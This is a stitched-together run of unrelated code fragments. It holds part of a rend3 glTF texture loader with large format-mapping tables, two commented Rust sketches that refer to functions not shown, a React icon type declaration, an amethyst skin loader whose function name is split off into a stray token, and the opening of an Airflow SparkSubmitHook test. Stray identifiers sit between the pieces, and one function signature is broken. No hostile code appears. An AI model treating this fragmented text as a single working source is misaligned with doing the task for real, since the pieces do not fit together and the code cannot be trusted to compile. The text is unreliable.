header.pixel_height), data, mip_count: if generate { types::MipmapCount::Maximum } else { types::MipmapCount::Specific(std::num::NonZeroU32::new(header.level_count).unwrap()) }, mip_source: if generate { types::MipmapSource::Generated } else { types::MipmapSource::Uploaded }, }) } #[cfg(feature = "ddsfile")] if texture.is_none() { if let Ok(dds) = ddsfile::Dds::read(&mut std::io::Cursor::new(&data)) { profiling::scope!("parsing dds"); let format = dds .get_dxgi_format() .map(|f| { util::map_dxgi_format(f, srgb) .ok_or_else(|| GltfLoadError::TextureBadDxgiFormat(uri.take().unwrap(), f)) }) .or_else(|| { dds.get_d3d_format().map(|f| { util::map_d3d_format(f, srgb) .ok_or_else(|| GltfLoadError::TextureBadD3DFormat(uri.take().unwrap(), f)) }) }) .unwrap()?; let levels = dds.get_num_mipmap_levels(); if levels == 0 { return Err(GltfLoadError::TextureZeroLevels(uri.take().unwrap())); } let guaranteed_format = format.describe().guaranteed_format_features; let generate = dds.get_num_mipmap_levels() == 1 && guaranteed_format.filterable && guaranteed_format.allowed_usages.contains( rend3::types::TextureUsages::TEXTURE_BINDING | rend3::types::TextureUsages::RENDER_ATTACHMENT, ); let data = dds .get_data(0) .map_err(|_| GltfLoadError::TextureTooManyLayers(uri.take().unwrap()))?; texture = Some(types::Texture { label: image.name().map(str::to_owned), format, size: UVec2::new(dds.get_width(), dds.get_height()), data: data.to_vec(), mip_count: if generate { types::MipmapCount::Maximum } else { types::MipmapCount::Specific(std::num::NonZeroU32::new(dds.get_num_mipmap_levels()).unwrap()) }, mip_source: if generate { types::MipmapSource::Generated } else { types::MipmapSource::Uploaded }, }) } } if texture.is_none() { profiling::scope!("decoding image"); let parsed = image::load_from_memory(&data).map_err(|e| GltfLoadError::TextureDecode(uri.take().unwrap(), e))?; let size = UVec2::new(parsed.width(), parsed.height()); let (data, format) = util::convert_dynamic_image(parsed, srgb); texture = Some(types::Texture { label: image.name().map(str::to_owned), format, size, data, mip_count: types::MipmapCount::Maximum, mip_source: types::MipmapSource::Generated, }) }; let texture = texture.unwrap(); let format = 
texture.format; let handle = renderer.add_texture_2d(texture); Ok(Labeled::new(Texture { handle, format }, image.name())) } /// Implementation utilities. pub mod util { use std::future::Future; use image::{buffer::ConvertBuffer, Bgra, ImageBuffer, Luma, Rgba}; use rend3::types; use crate::{Labeled, Texture}; /// Turns an `Option<Texture>` into `Option<types::TextureHandle>` pub fn extract_handle(texture: Option<Texture>) -> Option<types::TextureHandle> { texture.map(|t| t.handle) } /// Turns a `Option<Future<Output = Result<Labeled<T>, E>>>>` into a /// `Future<Output = Result<Option<T>, E>>` /// /// This is a very specific transformation that shows up a lot when using /// [`load_image_cached`](super::load_image_cached). pub async fn texture_option_resolve<F: Future, T, E>(fut: Option<F>) -> Result<Option<T>, E> where F: Future<Output = Result<Labeled<T>, E>>, { if let Some(f) = fut { match f.await { Ok(l) => Ok(Some(l.inner)), Err(e) => Err(e), } } else { Ok(None) } } pub fn convert_dynamic_image(image: image::DynamicImage, srgb: bool) -> (Vec<u8>, rend3::types::TextureFormat) { use rend3::types::TextureFormat as r3F; // profiling::scope!("convert dynamic image"); match image { image::DynamicImage::ImageLuma8(i) => (i.into_raw(), r3F::R8Unorm), image::DynamicImage::ImageLumaA8(i) => ( ConvertBuffer::<ImageBuffer<Luma<u8>, Vec<u8>>>::convert(&i).into_raw(), r3F::R8Unorm, ), image::DynamicImage::ImageRgb8(i) => ( ConvertBuffer::<ImageBuffer<Rgba<u8>, Vec<u8>>>::convert(&i).into_raw(), if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm }, ), image::DynamicImage::ImageRgba8(i) => { (i.into_raw(), if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm }) } image::DynamicImage::ImageBgr8(i) => ( ConvertBuffer::<ImageBuffer<Bgra<u8>, Vec<u8>>>::convert(&i).into_raw(), if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm }, ), image::DynamicImage::ImageBgra8(i) => { (i.into_raw(), if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm }) } i => ( i.into_rgba8().into_raw(), if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm }, ), } } /// Maps a ktx2 format into the rend3's TextureFormat #[cfg(feature = "ktx2")] pub fn map_ktx2_format(format: ktx2::Format, srgb: bool) -> Option<rend3::types::TextureFormat> { use ktx2::Format as k2F; use rend3::types::TextureFormat as r3F; Some(match format { k2F::R4G4_UNORM_PACK8 | k2F::R4G4B4A4_UNORM_PACK16 | k2F::B4G4R4A4_UNORM_PACK16 | k2F::R5G6B5_UNORM_PACK16 | k2F::B5G6R5_UNORM_PACK16 | k2F::R5G5B5A1_UNORM_PACK16 | k2F::B5G5R5A1_UNORM_PACK16 | k2F::A1R5G5B5_UNORM_PACK16 => return None, k2F::R8_UNORM | k2F::R8_SRGB => { if srgb { return None; } else { r3F::R8Unorm } } k2F::R8_SNORM => r3F::R8Snorm, k2F::R8_UINT => r3F::R8Uint, k2F::R8_SINT => r3F::R8Sint, k2F::R8G8_UNORM | k2F::R8G8_SRGB => { if srgb { return None; } else { r3F::Rg8Unorm } } k2F::R8G8_SNORM => r3F::Rg8Snorm, k2F::R8G8_UINT => r3F::Rg8Uint, k2F::R8G8_SINT => r3F::Rg8Sint, k2F::R8G8B8_UNORM | k2F::R8G8B8_SNORM | k2F::R8G8B8_UINT | k2F::R8G8B8_SINT | k2F::R8G8B8_SRGB | k2F::B8G8R8_UNORM | k2F::B8G8R8_SNORM | k2F::B8G8R8_UINT | k2F::B8G8R8_SINT | k2F::B8G8R8_SRGB => return None, k2F::R8G8B8A8_UNORM | k2F::R8G8B8A8_SRGB => { if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm } } k2F::R8G8B8A8_SNORM => r3F::Rgba8Snorm, k2F::R8G8B8A8_UINT => r3F::Rgba8Uint, k2F::R8G8B8A8_SINT => r3F::Rgba8Sint, k2F::B8G8R8A8_UNORM | k2F::B8G8R8A8_SRGB => { if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm } } k2F::B8G8R8A8_SNORM | k2F::B8G8R8A8_UINT | k2F::B8G8R8A8_SINT => return None, 
k2F::A2B10G10R10_UNORM_PACK32 => r3F::Rgb10a2Unorm, k2F::A2R10G10B10_UNORM_PACK32 | k2F::A2R10G10B10_SNORM_PACK32 | k2F::A2R10G10B10_UINT_PACK32 | k2F::A2R10G10B10_SINT_PACK32 | k2F::A2B10G10R10_SNORM_PACK32 | k2F::A2B10G10R10_UINT_PACK32 | k2F::A2B10G10R10_SINT_PACK32 => return None, k2F::R16_UNORM | k2F::R16_SNORM => return None, k2F::R16_UINT => r3F::R16Uint, k2F::R16_SINT => r3F::R16Sint, k2F::R16_SFLOAT => r3F::R16Float, k2F::R16G16_UNORM | k2F::R16G16_SNORM => return None, k2F::R16G16_UINT => r3F::Rg16Uint, k2F::R16G16_SINT => r3F::Rg16Sint, k2F::R16G16_SFLOAT => r3F::Rg16Float, k2F::R16G16B16_UNORM | k2F::R16G16B16_SNORM | k2F::R16G16B16_UINT | k2F::R16G16B16_SINT | k2F::R16G16B16_SFLOAT => return None, k2F::R16G16B16A16_UNORM => r3F::Rgba16Unorm, k2F::R16G16B16A16_SNORM => r3F::Rgba16Snorm, k2F::R16G16B16A16_UINT => r3F::Rgba16Uint, k2F::R16G16B16A16_SINT => r3F::Rgba16Sint, k2F::R16G16B16A16_SFLOAT => r3F::Rgba16Float, k2F::R32_UINT => r3F::R32Uint, k2F::R32_SINT => r3F::R32Sint, k2F::R32_SFLOAT => r3F::R32Float, k2F::R32G32_UINT => r3F::Rg32Uint, k2F::R32G32_SINT => r3F::Rg32Sint, k2F::R32G32_SFLOAT => r3F::Rg32Float, k2F::R32G32B32_UINT | k2F::R32G32B32_SINT | k2F::R32G32B32_SFLOAT => return None, k2F::R32G32B32A32_UINT => r3F::Rgba32Uint, k2F::R32G32B32A32_SINT => r3F::Rgba32Sint, k2F::R32G32B32A32_SFLOAT => r3F::Rgba32Float, k2F::R64_UINT | k2F::R64_SINT | k2F::R64_SFLOAT | k2F::R64G64_UINT | k2F::R64G64_SINT | k2F::R64G64_SFLOAT | k2F::R64G64B64_UINT | k2F::R64G64B64_SINT | k2F::R64G64B64_SFLOAT | k2F::R64G64B64A64_UINT | k2F::R64G64B64A64_SINT | k2F::R64G64B64A64_SFLOAT => return None, k2F::B10G11R11_UFLOAT_PACK32 => r3F::Rg11b10Float, k2F::E5B9G9R9_UFLOAT_PACK32 => r3F::Rgb9e5Ufloat, k2F::D16_UNORM => return None, k2F::X8_D24_UNORM_PACK32 => r3F::Depth24Plus, k2F::D32_SFLOAT => r3F::Depth32Float, k2F::S8_UINT | k2F::D16_UNORM_S8_UINT => return None, k2F::D24_UNORM_S8_UINT => r3F::Depth24PlusStencil8, k2F::D32_SFLOAT_S8_UINT => return None, k2F::BC1_RGB_UNORM_BLOCK | k2F::BC1_RGB_SRGB_BLOCK | k2F::BC1_RGBA_UNORM_BLOCK | k2F::BC1_RGBA_SRGB_BLOCK => { if srgb { r3F::Bc1RgbaUnormSrgb } else { r3F::Bc1RgbaUnorm } } k2F::BC2_UNORM_BLOCK | k2F::BC2_SRGB_BLOCK => { if srgb { r3F::Bc2RgbaUnormSrgb } else { r3F::Bc2RgbaUnorm } } k2F::BC3_UNORM_BLOCK | k2F::BC3_SRGB_BLOCK => { if srgb { r3F::Bc3RgbaUnormSrgb } else { r3F::Bc3RgbaUnorm } } k2F::BC4_UNORM_BLOCK => r3F::Bc4RUnorm, k2F::BC4_SNORM_BLOCK => r3F::Bc4RSnorm, k2F::BC5_UNORM_BLOCK => r3F::Bc5RgUnorm, k2F::BC5_SNORM_BLOCK => r3F::Bc5RgSnorm, k2F::BC6H_UFLOAT_BLOCK => r3F::Bc6hRgbUfloat, k2F::BC6H_SFLOAT_BLOCK => r3F::Bc6hRgbSfloat, k2F::BC7_UNORM_BLOCK | k2F::BC7_SRGB_BLOCK => { if srgb { r3F::Bc7RgbaUnormSrgb } else { r3F::Bc7RgbaUnorm } } k2F::ETC2_R8G8B8_UNORM_BLOCK | k2F::ETC2_R8G8B8_SRGB_BLOCK => { if srgb { r3F::Etc2Rgb8UnormSrgb } else { r3F::Etc2Rgb8Unorm } } k2F::ETC2_R8G8B8A1_UNORM_BLOCK | k2F::ETC2_R8G8B8A1_SRGB_BLOCK => { if srgb { r3F::Etc2Rgb8A1UnormSrgb } else { r3F::Etc2Rgb8A1Unorm } } k2F::ETC2_R8G8B8A8_UNORM_BLOCK | k2F::ETC2_R8G8B8A8_SRGB_BLOCK => return None, k2F::EAC_R11_UNORM_BLOCK => r3F::EacR11Unorm, k2F::EAC_R11_SNORM_BLOCK => r3F::EacR11Snorm, k2F::EAC_R11G11_UNORM_BLOCK => r3F::EacRg11Unorm, k2F::EAC_R11G11_SNORM_BLOCK => r3F::EacRg11Snorm, k2F::ASTC_4x4_UNORM_BLOCK | k2F::ASTC_4x4_SRGB_BLOCK => { if srgb { r3F::Astc4x4RgbaUnormSrgb } else { r3F::Astc4x4RgbaUnorm } } k2F::ASTC_5x4_UNORM_BLOCK | k2F::ASTC_5x4_SRGB_BLOCK => { if srgb { r3F::Astc5x4RgbaUnormSrgb } else { r3F::Astc5x4RgbaUnorm } } 
k2F::ASTC_5x5_UNORM_BLOCK | k2F::ASTC_5x5_SRGB_BLOCK => { if srgb { r3F::Astc5x5RgbaUnormSrgb } else { r3F::Astc5x5RgbaUnorm } } k2F::ASTC_6x5_UNORM_BLOCK | k2F::ASTC_6x5_SRGB_BLOCK => { if srgb { r3F::Astc6x5RgbaUnormSrgb } else { r3F::Astc6x5RgbaUnorm } } k2F::ASTC_6x6_UNORM_BLOCK | k2F::ASTC_6x6_SRGB_BLOCK => { if srgb { r3F::Astc6x6RgbaUnormSrgb } else { r3F::Astc6x6RgbaUnorm } } k2F::ASTC_8x5_UNORM_BLOCK | k2F::ASTC_8x5_SRGB_BLOCK => { if srgb { r3F::Astc8x5RgbaUnormSrgb } else { r3F::Astc8x5RgbaUnorm } } k2F::ASTC_8x6_UNORM_BLOCK | k2F::ASTC_8x6_SRGB_BLOCK => { if srgb { r3F::Astc8x6RgbaUnormSrgb } else { r3F::Astc8x6RgbaUnorm } } k2F::ASTC_8x8_UNORM_BLOCK | k2F::ASTC_8x8_SRGB_BLOCK => { if srgb { r3F::Astc8x8RgbaUnormSrgb } else { r3F::Astc8x8RgbaUnorm } } k2F::ASTC_10x5_UNORM_BLOCK | k2F::ASTC_10x5_SRGB_BLOCK => { if srgb { r3F::Astc10x5RgbaUnormSrgb } else { r3F::Astc10x5RgbaUnorm } } k2F::ASTC_10x6_UNORM_BLOCK | k2F::ASTC_10x6_SRGB_BLOCK => { if srgb { r3F::Astc10x6RgbaUnormSrgb } else { r3F::Astc10x6RgbaUnorm } } k2F::ASTC_10x8_UNORM_BLOCK | k2F::ASTC_10x8_SRGB_BLOCK => { if srgb { r3F::Astc10x8RgbaUnormSrgb } else { r3F::Astc10x8RgbaUnorm } } k2F::ASTC_10x10_UNORM_BLOCK | k2F::ASTC_10x10_SRGB_BLOCK => { if srgb { r3F::Astc10x10RgbaUnormSrgb } else { r3F::Astc10x10RgbaUnorm } } k2F::ASTC_12x10_UNORM_BLOCK | k2F::ASTC_12x10_SRGB_BLOCK => { if srgb { r3F::Astc12x10RgbaUnormSrgb } else { r3F::Astc12x10RgbaUnorm } } k2F::ASTC_12x12_UNORM_BLOCK | k2F::ASTC_12x12_SRGB_BLOCK => { if srgb { r3F::Astc12x12RgbaUnormSrgb } else { r3F::Astc12x12RgbaUnorm } } _ => return None, }) } /// Maps a dds file d3dformat into the rend3's TextureFormat #[cfg(feature = "ddsfile")] pub fn map_d3d_format(format: ddsfile::D3DFormat, srgb: bool) -> Option<rend3::types::TextureFormat> { use ddsfile::D3DFormat as d3F; use rend3::types::TextureFormat as r3F; Some(match format { d3F::A8B8G8R8 => { if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm } } d3F::G16R16 => r3F::Rg16Uint, d3F::A2B10G10R10 => return None, d3F::A1R5G5B5 => return None, d3F::R5G6B5 => return None, d3F::A8 => r3F::R8Unorm, d3F::A8R8G8B8 => { if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm } } d3F::X8R8G8B8 | d3F::X8B8G8R8 | d3F::A2R10G10B10 | d3F::R8G8B8 | d3F::X1R5G5B5 | d3F::A4R4G4B4 | d3F::X4R4G4B4 | d3F::A8R3G3B2 => return None, d3F::A8L8 => r3F::Rg8Uint, d3F::L16 => r3F::R16Uint, d3F::L8 => r3F::R8Uint, d3F::A4L4 => return None, d3F::DXT1 => { if srgb { r3F::Bc1RgbaUnormSrgb } else { r3F::Bc1RgbaUnorm } } d3F::DXT2 | d3F::DXT3 => { if srgb { r3F::Bc2RgbaUnormSrgb } else { r3F::Bc2RgbaUnorm } } d3F::DXT4 | d3F::DXT5 => { if srgb { r3F::Bc3RgbaUnormSrgb } else { r3F::Bc3RgbaUnorm } } d3F::R8G8_B8G8 => return None, d3F::G8R8_G8B8 => return None, d3F::A16B16G16R16 => r3F::Rgba16Uint, d3F::Q16W16V16U16 => r3F::Rgba16Sint, d3F::R16F => r3F::R16Float, d3F::G16R16F => r3F::Rg16Float, d3F::A16B16G16R16F => r3F::Rgba16Float, d3F::R32F => r3F::R32Float, d3F::G32R32F => r3F::Rg32Float, d3F::A32B32G32R32F => r3F::Rgba32Float, d3F::UYVY => return None, d3F::YUY2 => return None, d3F::CXV8U8 => return None, }) } #[cfg(feature = "ddsfile")] pub fn map_dxgi_format(format: ddsfile::DxgiFormat, srgb: bool) -> Option<rend3::types::TextureFormat> { use ddsfile::DxgiFormat as d3F; use rend3::types::TextureFormat as r3F; Some(match format { d3F::Unknown => return None, d3F::R32G32B32A32_Typeless | d3F::R32G32B32A32_Float => r3F::Rgba32Float, d3F::R32G32B32A32_UInt => r3F::Rgba32Uint, d3F::R32G32B32A32_SInt => r3F::Rgba32Sint, 
d3F::R32G32B32_Typeless | d3F::R32G32B32_Float | d3F::R32G32B32_UInt | d3F::R32G32B32_SInt => return None, d3F::R16G16B16A16_Typeless | d3F::R16G16B16A16_Float => r3F::Rgba16Float, d3F::R16G16B16A16_UInt => r3F::Rgba16Uint, d3F::R16G16B16A16_UNorm | d3F::R16G16B16A16_SNorm => return None, d3F::R16G16B16A16_SInt => r3F::Rgba16Sint, d3F::R32G32_Typeless | d3F::R32G32_Float => r3F::Rg32Float, d3F::R32G32_UInt => r3F::Rg32Uint, d3F::R32G32_SInt => r3F::Rg32Sint, d3F::R32G8X24_Typeless | d3F::D32_Float_S8X24_UInt | d3F::R32_Float_X8X24_Typeless | d3F::X32_Typeless_G8X24_UInt | d3F::R10G10B10A2_Typeless | d3F::R10G10B10A2_UNorm | d3F::R10G10B10A2_UInt => return None, d3F::R11G11B10_Float => r3F::Rg11b10Float, d3F::R8G8B8A8_Typeless | d3F::R8G8B8A8_UNorm | d3F::R8G8B8A8_UNorm_sRGB => { if srgb { r3F::Rgba8UnormSrgb } else { r3F::Rgba8Unorm } } d3F::R8G8B8A8_UInt => r3F::Rgba8Uint, d3F::R8G8B8A8_SNorm => r3F::Rgba8Snorm, d3F::R8G8B8A8_SInt => r3F::Rgba8Sint, d3F::R16G16_Typeless | d3F::R16G16_Float => r3F::Rg16Float, d3F::R16G16_UInt => r3F::Rg16Uint, d3F::R16G16_SInt => r3F::Rg16Sint, d3F::R16G16_UNorm | d3F::R16G16_SNorm => return None, d3F::R32_Typeless | d3F::R32_Float => r3F::R32Float, d3F::D32_Float => r3F::Depth32Float, d3F::R32_UInt => r3F::R32Uint, d3F::R32_SInt => r3F::R32Sint, d3F::R24G8_Typeless | d3F::D24_UNorm_S8_UInt => r3F::Depth24PlusStencil8, d3F::R24_UNorm_X8_Typeless => r3F::Depth24Plus, d3F::X24_Typeless_G8_UInt => return None, d3F::R8G8_Typeless | d3F::R8G8_UNorm => r3F::Rg8Unorm, d3F::R8G8_UInt => r3F::Rg8Uint, d3F::R8G8_SNorm => r3F::Rg8Snorm, d3F::R8G8_SInt => r3F::Rg8Sint, d3F::R16_Typeless | d3F::R16_Float => r3F::R16Float, d3F::D16_UNorm | d3F::R16_SNorm | d3F::R16_UNorm => return None, d3F::R16_UInt => r3F::R16Uint, d3F::R16_SInt => r3F::R16Sint, d3F::R8_Typeless | d3F::R8_UNorm => r3F::R8Unorm, d3F::R8_UInt => r3F::R8Uint, d3F::R8_SNorm => r3F::R8Snorm, d3F::R8_SInt => r3F::R8Sint, d3F::A8_UNorm => return None, d3F::R1_UNorm => return None, d3F::R9G9B9E5_SharedExp => r3F::Rgb9e5Ufloat, d3F::R8G8_B8G8_UNorm => return None, d3F::G8R8_G8B8_UNorm => return None, d3F::BC1_Typeless | d3F::BC1_UNorm | d3F::BC1_UNorm_sRGB => { if srgb { r3F::Bc1RgbaUnormSrgb } else { r3F::Bc1RgbaUnorm } } d3F::BC2_Typeless | d3F::BC2_UNorm | d3F::BC2_UNorm_sRGB => { if srgb { r3F::Bc2RgbaUnormSrgb } else { r3F::Bc2RgbaUnorm } } d3F::BC3_Typeless | d3F::BC3_UNorm | d3F::BC3_UNorm_sRGB => { if srgb { r3F::Bc3RgbaUnormSrgb } else { r3F::Bc3RgbaUnorm } } d3F::BC4_Typeless | d3F::BC4_UNorm => r3F::Bc4RUnorm, d3F::BC4_SNorm => r3F::Bc4RSnorm, d3F::BC5_Typeless | d3F::BC5_UNorm => r3F::Bc5RgUnorm, d3F::BC5_SNorm => r3F::Bc5RgSnorm, d3F::B5G6R5_UNorm | d3F::B5G5R5A1_UNorm => return None, d3F::B8G8R8A8_UNorm | d3F::B8G8R8A8_Typeless | d3F::B8G8R8A8_UNorm_sRGB => { if srgb { r3F::Bgra8UnormSrgb } else { r3F::Bgra8Unorm } } d3F::B8G8R8X8_UNorm | d3F::R10G10B10_XR_Bias_A2_UNorm | d3F::B8G8R8X8_Typeless | d3F::B8G8R8X8_UNorm_sRGB => return None, d3F::BC6H_Typeless | d3F::BC6H_UF16 => r3F::Bc6hRgbUfloat, d3F::BC6H_SF16 => r3F::Bc6hRgbSfloat, d3F::BC7_Typeless | d3F::BC7_UNorm | d3F::BC7_UNorm_sRGB => { if srgb { r3F::Bc7RgbaUnormSrgb } else { r3F::Bc7RgbaUnorm } } d3F::AYUV | d3F::Y410 | d3F::Y416 | d3F::NV12 | d3F::P010 | d3F::P016 | d3F::Format_420_Opaque | d3F::YUY2 | d3F::Y210 | d3F::Y216 | d3F::NV11 | d3F::AI44 | d3F::IA44 | d3F::P8 | d3F::A8P8 | d3F::B4G4R4A4_UNorm | d3F::P208 | d3F::V208 | d3F::V408 | d3F::Force_UInt => return None, }) } }
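// Hedged sketch, not part of rend3-gltf: a fallible variant of the "data:" URI
// branch in `filesystem_io_func` above, which currently `unwrap`s its parsing
// steps and carries a `// TODO: errors` comment. The helper name and the
// String error type are illustrative assumptions only.
fn decode_data_uri(uri: &str) -> Result<Vec<u8>, String> {
    // Expected shape: "data:<mime>;base64,<payload>"
    let rest = uri.strip_prefix("data:").ok_or("not a data uri")?;
    let (_mime, rest) = rest.split_once(';').ok_or("missing ';' after the mime type")?;
    let (encoding, payload) = rest.split_once(',').ok_or("missing ',' before the payload")?;
    if encoding != "base64" {
        return Err(format!("unsupported data uri encoding '{}'", encoding));
    }
    base64::decode(payload).map_err(|e| e.to_string())
}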
compute_animation_duration
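// Hedged sketch, separate from the crate above: illustrates the
// parents-before-children guarantee documented on
// `GltfSceneInstance::topological_order` and relied on by
// `instance_loaded_scene`. The standalone helpers and the direct `glam`
// dependency are assumptions made for the example only.
use std::collections::{BTreeMap, VecDeque};
use glam::Mat4;

// Breadth-first ordering over a child -> parent map; roots come out first.
fn topological_order(parents: &BTreeMap<usize, usize>, node_count: usize) -> Vec<usize> {
    // Invert the map into per-parent child lists.
    let mut children = vec![Vec::new(); node_count];
    for (&child, &parent) in parents {
        children[parent].push(child);
    }
    // Seed the queue with every node that has no parent, i.e. the roots.
    let mut queue: VecDeque<usize> = (0..node_count).filter(|n| !parents.contains_key(n)).collect();
    let mut order = Vec::with_capacity(node_count);
    while let Some(n) = queue.pop_front() {
        order.push(n);
        queue.extend(children[n].iter().copied());
    }
    order
}

// Because every parent precedes its children in `order`, world transforms can
// be accumulated in a single pass with no recursion, like the node loop in
// `instance_loaded_scene`.
fn world_transforms(order: &[usize], parents: &BTreeMap<usize, usize>, local: &[Mat4]) -> Vec<Mat4> {
    let mut world = vec![Mat4::IDENTITY; local.len()];
    for &n in order {
        let parent = parents.get(&n).copied().map(|p| world[p]).unwrap_or(Mat4::IDENTITY);
        world[n] = parent * local[n];
    }
    world
}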
ArrowElbowRight.d.ts
import React from "react"; import { IconProps } from "../lib"; declare const ArrowElbowRight: React.ForwardRefExoticComponent<IconProps & React.RefAttributes<SVGSVGElement>>;
export default ArrowElbowRight;
skin.rs
use std::collections::HashMap; use amethyst_animation::{Joint, Skin}; use amethyst_core::{ ecs::{Entity, World}, math::{convert, Matrix4}, }; use amethyst_rendy::skinning::JointTransforms; use gltf::buffer::Data; use crate::importer::SkinInfo; pub fn
( skin: &gltf::Skin<'_>, buffers: &[Data], entity: Entity, skin_infos: &SkinInfo, node_map: &HashMap<usize, Entity>, world: &mut World, ) { let joint_entities = skin .joints() .map(|j| { node_map.get(&j.index()).cloned().expect( "Unreachable: `node_map` is initialized with the indexes from the `Gltf` object", ) }) .collect::<Vec<_>>(); let reader = skin.reader(|buffer| { Some( buffers .get(buffer.index()) .expect("Error while reading skin buffer") .0 .as_slice(), ) }); let inverse_bind_matrices = reader .read_inverse_bind_matrices() .map(|matrices| { matrices .map(Matrix4::from) .map(convert::<_, Matrix4<f32>>) .collect() }) .unwrap_or_else(|| vec![Matrix4::identity(); joint_entities.len()]); let mut aggregator = HashMap::<Entity, Vec<Entity>>::new(); for (_bind_index, joint_entity) in joint_entities.iter().enumerate() { aggregator .entry(*joint_entity) .or_insert_with(Vec::new) .push(entity); } for (entity, skins) in aggregator.iter() { let joint = Joint { skins: skins.clone(), }; world .entry(*entity) .expect("This can't be reached because the entity comes from this world") .add_component(joint); } let joint_transforms = JointTransforms { skin: entity, matrices: vec![Matrix4::identity(); joint_entities.len()], }; for mesh_entity in &skin_infos.mesh_indices { world .entry(*mesh_entity) .expect("This can't be reached because the entity comes from this world") .add_component(joint_transforms.clone()); } let len = joint_entities.len(); let skin = Skin { joints: joint_entities, meshes: skin_infos.mesh_indices.clone(), bind_shape_matrix: Matrix4::identity(), inverse_bind_matrices, joint_matrices: Vec::with_capacity(len), }; world .entry(entity) .expect("This can't be reached because the entity comes from this world") .add_component(skin); }
load_skin
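// Hedged sketch, not part of this importer: shows how the
// `inverse_bind_matrices` loaded above are conventionally combined with the
// joints' current world transforms to produce skinning matrices. At rest pose
// the world transform equals the bind pose, so every product is the identity,
// which is why identity matrices are a valid default when the accessor is
// absent. The free function is an illustrative assumption, not amethyst's API.
use amethyst_core::math::Matrix4;

fn joint_matrices(
    joint_world_transforms: &[Matrix4<f32>],
    inverse_bind_matrices: &[Matrix4<f32>],
) -> Vec<Matrix4<f32>> {
    joint_world_transforms
        .iter()
        .zip(inverse_bind_matrices.iter())
        // Standard skinning formula: joint matrix = world transform * inverse bind matrix.
        .map(|(world, inv_bind)| world * inv_bind)
        .collect()
}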
test_spark_submit_hook.py
# -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import io import unittest from unittest.mock import call, patch from airflow import AirflowException from airflow.contrib.hooks.spark_submit_hook import SparkSubmitHook from airflow.models import Connection from airflow.utils import db class TestSparkSubmitHook(unittest.TestCase): _spark_job_file = 'test_application.py' _config = { 'conf': { 'parquet.compression': 'SNAPPY' }, 'conn_id': 'default_spark', 'files': 'hive-site.xml', 'py_files': 'sample_library.py', 'archives': 'sample_archive.zip#SAMPLE', 'jars': 'parquet.jar', 'packages': 'com.databricks:spark-avro_2.11:3.2.0', 'exclude_packages': 'org.bad.dependency:1.0.0', 'repositories': 'http://myrepo.org', 'total_executor_cores': 4, 'executor_cores': 4, 'executor_memory': '22g', 'keytab': 'privileged_user.keytab', 'principal': 'user/[email protected]', 'proxy_user': 'sample_user', 'name': 'spark-job', 'num_executors': 10, 'verbose': True, 'driver_memory': '3g', 'java_class': 'com.foo.bar.AppMain', 'application_args': [ '-f', 'foo', '--bar', 'bar', '--with-spaces', 'args should keep embdedded spaces', 'baz' ] } @staticmethod def cmd_args_to_dict(list_cmd): return_dict = {} for arg in list_cmd: if arg.startswith("--"): pos = list_cmd.index(arg) return_dict[arg] = list_cmd[pos + 1] return return_dict def setUp(self): db.merge_conn( Connection( conn_id='spark_yarn_cluster', conn_type='spark', host='yarn://yarn-master', extra='{"queue": "root.etl", "deploy-mode": "cluster"}') ) db.merge_conn( Connection( conn_id='spark_k8s_cluster', conn_type='spark', host='k8s://https://k8s-master', extra='{"spark-home": "/opt/spark", ' + '"deploy-mode": "cluster", ' + '"namespace": "mynamespace"}') ) db.merge_conn( Connection( conn_id='spark_default_mesos', conn_type='spark', host='mesos://host', port=5050) ) db.merge_conn( Connection( conn_id='spark_home_set', conn_type='spark', host='yarn://yarn-master', extra='{"spark-home": "/opt/myspark"}') ) db.merge_conn( Connection( conn_id='spark_home_not_set', conn_type='spark', host='yarn://yarn-master') ) db.merge_conn( Connection( conn_id='spark_binary_set', conn_type='spark', host='yarn', extra='{"spark-binary": "custom-spark-submit"}') ) db.merge_conn( Connection( conn_id='spark_binary_and_home_set', conn_type='spark', host='yarn', extra='{"spark-home": "/path/to/spark_home", ' + '"spark-binary": "custom-spark-submit"}') ) db.merge_conn( Connection( conn_id='spark_standalone_cluster', conn_type='spark', host='spark://spark-standalone-master:6066', extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "cluster"}') ) db.merge_conn( Connection( conn_id='spark_standalone_cluster_client_mode', conn_type='spark', host='spark://spark-standalone-master:6066', extra='{"spark-home": "/path/to/spark_home", "deploy-mode": 
"client"}') ) def test_build_spark_submit_command(self): # Given hook = SparkSubmitHook(**self._config) # When cmd = hook._build_spark_submit_command(self._spark_job_file) # Then expected_build_cmd = [ 'spark-submit', '--master', 'yarn', '--conf', 'parquet.compression=SNAPPY', '--files', 'hive-site.xml', '--py-files', 'sample_library.py', '--archives', 'sample_archive.zip#SAMPLE', '--jars', 'parquet.jar', '--packages', 'com.databricks:spark-avro_2.11:3.2.0', '--exclude-packages', 'org.bad.dependency:1.0.0', '--repositories', 'http://myrepo.org', '--num-executors', '10', '--total-executor-cores', '4', '--executor-cores', '4', '--executor-memory', '22g', '--driver-memory', '3g', '--keytab', 'privileged_user.keytab', '--principal', 'user/[email protected]', '--proxy-user', 'sample_user', '--name', 'spark-job', '--class', 'com.foo.bar.AppMain', '--verbose', 'test_application.py', '-f', 'foo', '--bar', 'bar', '--with-spaces', 'args should keep embdedded spaces', 'baz' ] self.assertEqual(expected_build_cmd, cmd) @patch('airflow.contrib.hooks.spark_submit_hook.subprocess.Popen') def test_spark_process_runcmd(self, mock_popen): # Given mock_popen.return_value.stdout = io.StringIO('stdout') mock_popen.return_value.stderr = io.StringIO('stderr') 